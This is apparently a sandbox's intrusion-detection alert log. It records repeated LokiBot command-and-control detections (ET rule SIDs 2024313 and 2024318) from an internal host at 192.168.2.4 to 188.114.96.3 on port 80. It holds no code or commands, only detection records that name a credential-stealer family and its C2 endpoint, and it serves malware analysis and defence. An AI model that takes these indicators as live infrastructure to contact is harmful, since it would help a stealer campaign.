2024-09-25T15:29:02.085525+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55902	188.114.96.3	80	TCP
2024-09-25T15:29:03.023456+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55903	188.114.96.3	80	TCP
2024-09-25T15:29:03.936890+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55904	188.114.96.3	80	TCP
2024-09-25T15:29:04.757534+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55905	188.114.96.3	80	TCP
2024-09-25T15:29:05.574850+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55906	188.114.96.3	80	TCP
2024-09-25T15:29:06.426526+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55907	188.114.96.3	80	TCP
2024-09-25T15:29:07.270520+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55908	188.114.96.3	80	TCP
2024-09-25T15:29:08.155785+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55909	188.114.96.3	80	TCP
2024-09-25T15:29:09.003544+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55910	188.114.96.3	80	TCP
2024-09-25T15:29:09.872961+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55911	188.114.96.3	80	TCP
2024-09-25T15:29:10.728142+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55912	188.114.96.3	80	TCP
2024-09-25T15:29:11.581836+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55913	188.114.96.3	80	TCP
2024-09-25T15:29:12.445970+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55914	188.114.96.3	80	TCP
2024-09-25T15:29:13.328556+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55915	188.114.96.3	80	TCP
2024-09-25T15:29:14.284533+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55916	188.114.96.3	80	TCP
2024-09-25T15:29:15.163543+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55917	188.114.96.3	80	TCP
2024-09-25T15:29:16.082398+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55918	188.114.96.3	80	TCP
2024-09-25T15:29:17.069655+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55919	188.114.96.3	80	TCP
2024-09-25T15:29:17.927204+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55920	188.114.96.3	80	TCP
2024-09-25T15:29:18.781204+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55921	188.114.96.3	80	TCP
2024-09-25T15:29:19.609687+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55922	188.114.96.3	80	TCP
2024-09-25T15:29:20.495550+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55923	188.114.96.3	80	TCP
2024-09-25T15:29:21.686655+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55924	188.114.96.3	80	TCP
2024-09-25T15:29:22.674104+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55925	188.114.96.3	80	TCP
2024-09-25T15:29:23.754090+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55926	188.114.96.3	80	TCP
2024-09-25T15:29:24.756018+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55927	188.114.96.3	80	TCP
2024-09-25T15:29:26.878403+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55928	188.114.96.3	80	TCP
2024-09-25T15:29:27.710722+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55929	188.114.96.3	80	TCP
2024-09-25T15:29:28.623111+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55931	188.114.96.3	80	TCP
2024-09-25T15:29:29.616024+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55932	188.114.96.3	80	TCP
2024-09-25T15:29:30.431091+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55933	188.114.96.3	80	TCP
2024-09-25T15:29:31.557337+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55934	188.114.96.3	80	TCP
2024-09-25T15:29:32.624051+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55935	188.114.96.3	80	TCP
2024-09-25T15:29:33.508697+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55936	188.114.96.3	80	TCP
2024-09-25T15:29:34.368849+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55937	188.114.96.3	80	TCP
2024-09-25T15:29:35.193903+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55938	188.114.96.3	80	TCP
2024-09-25T15:29:36.042891+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55939	188.114.96.3	80	TCP
2024-09-25T15:29:36.930414+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55940	188.114.96.3	80	TCP
2024-09-25T15:29:37.927518+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55941	188.114.96.3	80	TCP
2024-09-25T15:29:38.890390+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55942	188.114.96.3	80	TCP
2024-09-25T15:29:39.761200+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55943	188.114.96.3	80	TCP
2024-09-25T15:29:40.653978+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55944	188.114.96.3	80	TCP
2024-09-25T15:29:41.471815+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55945	188.114.96.3	80	TCP
2024-09-25T15:29:42.305950+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55946	188.114.96.3	80	TCP
2024-09-25T15:29:43.162638+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55947	188.114.96.3	80	TCP
2024-09-25T15:29:44.097010+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55948	188.114.96.3	80	TCP
2024-09-25T15:29:45.056343+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55949	188.114.96.3	80	TCP
2024-09-25T15:29:46.147975+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55950	188.114.96.3	80	TCP
2024-09-25T15:29:47.186447+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55951	188.114.96.3	80	TCP
2024-09-25T15:29:48.240064+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55952	188.114.96.3	80	TCP
2024-09-25T15:29:49.512910+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55953	188.114.96.3	80	TCP
2024-09-25T15:29:50.344616+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55954	188.114.96.3	80	TCP
2024-09-25T15:29:51.275783+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55955	188.114.96.3	80	TCP
2024-09-25T15:29:52.197836+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55956	188.114.96.3	80	TCP
2024-09-25T15:29:53.229813+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55957	188.114.96.3	80	TCP
2024-09-25T15:29:54.101488+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55958	188.114.96.3	80	TCP
2024-09-25T15:29:54.972069+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55959	188.114.96.3	80	TCP
2024-09-25T15:29:56.064141+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55960	188.114.96.3	80	TCP
2024-09-25T15:29:56.901470+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55961	188.114.96.3	80	TCP
2024-09-25T15:29:57.735297+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55962	188.114.96.3	80	TCP
2024-09-25T15:29:58.842437+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55963	188.114.96.3	80	TCP
2024-09-25T15:29:59.669969+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55964	188.114.96.3	80	TCP
2024-09-25T15:30:00.558633+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55965	188.114.96.3	80	TCP
2024-09-25T15:30:01.627418+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55966	188.114.96.3	80	TCP
2024-09-25T15:30:02.596189+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55967	188.114.96.3	80	TCP
2024-09-25T15:30:03.523662+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55968	188.114.96.3	80	TCP
2024-09-25T15:30:05.068828+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55969	188.114.96.3	80	TCP
2024-09-25T15:30:06.054434+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55970	188.114.96.3	80	TCP
2024-09-25T15:30:07.461247+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55971	188.114.96.3	80	TCP
2024-09-25T15:30:08.370283+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55972	188.114.96.3	80	TCP
2024-09-25T15:30:09.181372+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55973	188.114.96.3	80	TCP
2024-09-25T15:30:10.051609+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55974	188.114.96.3	80	TCP
2024-09-25T15:30:10.861804+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55975	188.114.96.3	80	TCP
2024-09-25T15:30:12.048794+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55976	188.114.96.3	80	TCP
2024-09-25T15:30:12.921894+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55977	188.114.96.3	80	TCP
2024-09-25T15:30:13.839050+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55978	188.114.96.3	80	TCP
2024-09-25T15:30:14.665373+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55979	188.114.96.3	80	TCP
2024-09-25T15:30:15.525637+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55980	188.114.96.3	80	TCP
2024-09-25T15:30:16.351549+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55981	188.114.96.3	80	TCP
2024-09-25T15:30:17.330144+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55982	188.114.96.3	80	TCP
2024-09-25T15:30:18.191485+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55983	188.114.96.3	80	TCP
2024-09-25T15:30:19.039902+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55984	188.114.96.3	80	TCP
2024-09-25T15:30:19.925798+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55985	188.114.96.3	80	TCP
2024-09-25T15:30:21.355002+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55986	188.114.96.3	80	TCP
2024-09-25T15:30:22.975845+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55987	188.114.96.3	80	TCP
2024-09-25T15:30:24.171451+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55988	188.114.96.3	80	TCP
2024-09-25T15:30:25.134380+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55989	188.114.96.3	80	TCP
2024-09-25T15:30:26.009752+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55990	188.114.96.3	80	TCP
2024-09-25T15:30:26.831403+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55991	188.114.96.3	80	TCP
2024-09-25T15:30:27.738071+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55992	188.114.96.3	80	TCP
2024-09-25T15:30:28.608409+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55993	188.114.96.3	80	TCP
2024-09-25T15:30:29.440258+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55994	188.114.96.3	80	TCP
2024-09-25T15:30:30.271298+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55995	188.114.96.3	80	TCP
2024-09-25T15:30:31.121473+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55996	188.114.96.3	80	TCP
2024-09-25T15:30:31.982949+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55997	188.114.96.3	80	TCP
2024-09-25T15:30:32.891448+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55998	188.114.96.3	80	TCP
2024-09-25T15:30:33.917047+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	55999	188.114.96.3	80	TCP
2024-09-25T15:30:35.635959+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	56000	188.114.96.3	80	TCP
2024-09-25T15:30:36.512575+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	56001	188.114.96.3	80	TCP
2024-09-25T15:30:38.532750+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	56002	188.114.96.3	80	TCP
2024-09-25T15:30:39.444328+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	56003	188.114.96.3	80	TCP
2024-09-25T15:30:40.283415+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	56004	188.114.96.3	80	TCP
2024-09-25T15:30:41.170973+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	56005	188.114.96.3	80	TCP
2024-09-25T15:30:42.064291+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	56006	188.114.96.3	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-25T15:28:39.241108+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49732	188.114.96.3	80	TCP
2024-09-25T15:28:40.175614+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49733	188.114.96.3	80	TCP
2024-09-25T15:28:41.113236+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49734	188.114.96.3	80	TCP
2024-09-25T15:28:41.990383+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49735	188.114.96.3	80	TCP
2024-09-25T15:28:42.845238+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49736	188.114.96.3	80	TCP
2024-09-25T15:28:43.869838+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49737	188.114.96.3	80	TCP
2024-09-25T15:28:44.707278+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49738	188.114.96.3	80	TCP
2024-09-25T15:28:45.626258+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49739	188.114.96.3	80	TCP
2024-09-25T15:28:46.435201+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49740	188.114.96.3	80	TCP
2024-09-25T15:28:47.272281+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49741	188.114.96.3	80	TCP
2024-09-25T15:28:48.160931+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49743	188.114.96.3	80	TCP
2024-09-25T15:28:49.039252+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49745	188.114.96.3	80	TCP
2024-09-25T15:28:49.978517+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49747	188.114.96.3	80	TCP
2024-09-25T15:28:50.952046+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49749	188.114.96.3	80	TCP
2024-09-25T15:28:51.830924+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55890	188.114.96.3	80	TCP
2024-09-25T15:28:52.731636+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55892	188.114.96.3	80	TCP
2024-09-25T15:28:53.550696+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55893	188.114.96.3	80	TCP
2024-09-25T15:28:54.379847+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55894	188.114.96.3	80	TCP
2024-09-25T15:28:55.230197+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55895	188.114.96.3	80	TCP
2024-09-25T15:28:56.263321+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55896	188.114.96.3	80	TCP
2024-09-25T15:28:57.191920+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55897	188.114.96.3	80	TCP
2024-09-25T15:28:58.321400+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55898	188.114.96.3	80	TCP
2024-09-25T15:28:59.169488+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55899	188.114.96.3	80	TCP
2024-09-25T15:29:00.300722+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55900	188.114.96.3	80	TCP
2024-09-25T15:29:01.202417+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55901	188.114.96.3	80	TCP
2024-09-25T15:29:02.085525+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55902	188.114.96.3	80	TCP
2024-09-25T15:29:03.023456+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55903	188.114.96.3	80	TCP
2024-09-25T15:29:03.936890+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55904	188.114.96.3	80	TCP
2024-09-25T15:29:04.757534+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55905	188.114.96.3	80	TCP
2024-09-25T15:29:05.574850+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55906	188.114.96.3	80	TCP
2024-09-25T15:29:06.426526+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55907	188.114.96.3	80	TCP
2024-09-25T15:29:07.270520+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55908	188.114.96.3	80	TCP
2024-09-25T15:29:08.155785+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55909	188.114.96.3	80	TCP
2024-09-25T15:29:09.003544+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55910	188.114.96.3	80	TCP
2024-09-25T15:29:09.872961+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55911	188.114.96.3	80	TCP
2024-09-25T15:29:10.728142+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55912	188.114.96.3	80	TCP
2024-09-25T15:29:11.581836+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55913	188.114.96.3	80	TCP
2024-09-25T15:29:12.445970+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55914	188.114.96.3	80	TCP
2024-09-25T15:29:13.328556+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55915	188.114.96.3	80	TCP
2024-09-25T15:29:14.284533+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55916	188.114.96.3	80	TCP
2024-09-25T15:29:15.163543+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55917	188.114.96.3	80	TCP
2024-09-25T15:29:16.082398+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55918	188.114.96.3	80	TCP
2024-09-25T15:29:17.069655+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55919	188.114.96.3	80	TCP
2024-09-25T15:29:17.927204+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55920	188.114.96.3	80	TCP
2024-09-25T15:29:18.781204+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55921	188.114.96.3	80	TCP
2024-09-25T15:29:19.609687+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55922	188.114.96.3	80	TCP
2024-09-25T15:29:20.495550+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55923	188.114.96.3	80	TCP
2024-09-25T15:29:21.686655+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55924	188.114.96.3	80	TCP
2024-09-25T15:29:22.674104+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55925	188.114.96.3	80	TCP
2024-09-25T15:29:23.754090+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55926	188.114.96.3	80	TCP
2024-09-25T15:29:24.756018+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55927	188.114.96.3	80	TCP
2024-09-25T15:29:26.878403+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55928	188.114.96.3	80	TCP
2024-09-25T15:29:27.710722+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55929	188.114.96.3	80	TCP
2024-09-25T15:29:28.623111+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55931	188.114.96.3	80	TCP
2024-09-25T15:29:29.616024+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55932	188.114.96.3	80	TCP
2024-09-25T15:29:30.431091+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55933	188.114.96.3	80	TCP
2024-09-25T15:29:31.557337+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55934	188.114.96.3	80	TCP
2024-09-25T15:29:32.624051+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55935	188.114.96.3	80	TCP
2024-09-25T15:29:33.508697+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55936	188.114.96.3	80	TCP
2024-09-25T15:29:34.368849+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55937	188.114.96.3	80	TCP
2024-09-25T15:29:35.193903+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55938	188.114.96.3	80	TCP
2024-09-25T15:29:36.042891+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55939	188.114.96.3	80	TCP
2024-09-25T15:29:36.930414+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55940	188.114.96.3	80	TCP
2024-09-25T15:29:37.927518+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55941	188.114.96.3	80	TCP
2024-09-25T15:29:38.890390+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55942	188.114.96.3	80	TCP
2024-09-25T15:29:39.761200+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55943	188.114.96.3	80	TCP
2024-09-25T15:29:40.653978+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55944	188.114.96.3	80	TCP
2024-09-25T15:29:41.471815+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55945	188.114.96.3	80	TCP
2024-09-25T15:29:42.305950+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55946	188.114.96.3	80	TCP
2024-09-25T15:29:43.162638+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55947	188.114.96.3	80	TCP
2024-09-25T15:29:44.097010+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55948	188.114.96.3	80	TCP
2024-09-25T15:29:45.056343+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55949	188.114.96.3	80	TCP
2024-09-25T15:29:46.147975+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55950	188.114.96.3	80	TCP
2024-09-25T15:29:47.186447+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55951	188.114.96.3	80	TCP
2024-09-25T15:29:48.240064+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55952	188.114.96.3	80	TCP
2024-09-25T15:29:49.512910+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55953	188.114.96.3	80	TCP
2024-09-25T15:29:50.344616+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55954	188.114.96.3	80	TCP
2024-09-25T15:29:51.275783+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55955	188.114.96.3	80	TCP
2024-09-25T15:29:52.197836+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55956	188.114.96.3	80	TCP
2024-09-25T15:29:53.229813+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55957	188.114.96.3	80	TCP
2024-09-25T15:29:54.101488+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55958	188.114.96.3	80	TCP
2024-09-25T15:29:54.972069+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55959	188.114.96.3	80	TCP
2024-09-25T15:29:56.064141+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55960	188.114.96.3	80	TCP
2024-09-25T15:29:56.901470+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55961	188.114.96.3	80	TCP
2024-09-25T15:29:57.735297+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55962	188.114.96.3	80	TCP
2024-09-25T15:29:58.842437+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55963	188.114.96.3	80	TCP
2024-09-25T15:29:59.669969+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55964	188.114.96.3	80	TCP
2024-09-25T15:30:00.558633+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55965	188.114.96.3	80	TCP
2024-09-25T15:30:01.627418+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55966	188.114.96.3	80	TCP
2024-09-25T15:30:02.596189+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55967	188.114.96.3	80	TCP
2024-09-25T15:30:03.523662+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55968	188.114.96.3	80	TCP
2024-09-25T15:30:05.068828+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55969	188.114.96.3	80	TCP
2024-09-25T15:30:06.054434+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55970	188.114.96.3	80	TCP
2024-09-25T15:30:07.461247+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55971	188.114.96.3	80	TCP
2024-09-25T15:30:08.370283+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55972	188.114.96.3	80	TCP
2024-09-25T15:30:09.181372+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55973	188.114.96.3	80	TCP
2024-09-25T15:30:10.051609+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55974	188.114.96.3	80	TCP
2024-09-25T15:30:10.861804+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55975	188.114.96.3	80	TCP
2024-09-25T15:30:12.048794+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55976	188.114.96.3	80	TCP
2024-09-25T15:30:12.921894+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55977	188.114.96.3	80	TCP
2024-09-25T15:30:13.839050+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55978	188.114.96.3	80	TCP
2024-09-25T15:30:14.665373+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55979	188.114.96.3	80	TCP
2024-09-25T15:30:15.525637+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55980	188.114.96.3	80	TCP
2024-09-25T15:30:16.351549+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55981	188.114.96.3	80	TCP
2024-09-25T15:30:17.330144+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55982	188.114.96.3	80	TCP
2024-09-25T15:30:18.191485+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55983	188.114.96.3	80	TCP
2024-09-25T15:30:19.039902+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55984	188.114.96.3	80	TCP
2024-09-25T15:30:19.925798+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55985	188.114.96.3	80	TCP
2024-09-25T15:30:21.355002+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55986	188.114.96.3	80	TCP
2024-09-25T15:30:22.975845+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55987	188.114.96.3	80	TCP
2024-09-25T15:30:24.171451+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55988	188.114.96.3	80	TCP
2024-09-25T15:30:25.134380+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55989	188.114.96.3	80	TCP
2024-09-25T15:30:26.009752+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55990	188.114.96.3	80	TCP
2024-09-25T15:30:26.831403+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55991	188.114.96.3	80	TCP
2024-09-25T15:30:27.738071+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55992	188.114.96.3	80	TCP
2024-09-25T15:30:28.608409+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55993	188.114.96.3	80	TCP
2024-09-25T15:30:29.440258+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55994	188.114.96.3	80	TCP
2024-09-25T15:30:30.271298+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55995	188.114.96.3	80	TCP
2024-09-25T15:30:31.121473+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55996	188.114.96.3	80	TCP
2024-09-25T15:30:31.982949+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55997	188.114.96.3	80	TCP
2024-09-25T15:30:32.891448+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55998	188.114.96.3	80	TCP
2024-09-25T15:30:33.917047+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	55999	188.114.96.3	80	TCP
2024-09-25T15:30:35.635959+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	56000	188.114.96.3	80	TCP
2024-09-25T15:30:36.512575+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	56001	188.114.96.3	80	TCP
2024-09-25T15:30:38.532750+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	56002	188.114.96.3	80	TCP
